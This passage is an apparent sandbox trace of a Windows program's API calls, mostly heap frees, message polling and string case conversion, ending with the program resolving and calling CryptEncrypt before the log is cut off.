hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.606] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.607] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.607] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.607] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.608] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.608] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.608] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.609] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.609] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.610] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.610] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.610] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.611] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.611] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.611] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.611] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c8070 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa718, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.617] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0258.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0258.618] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x15e14, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x15e18) returned 1 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 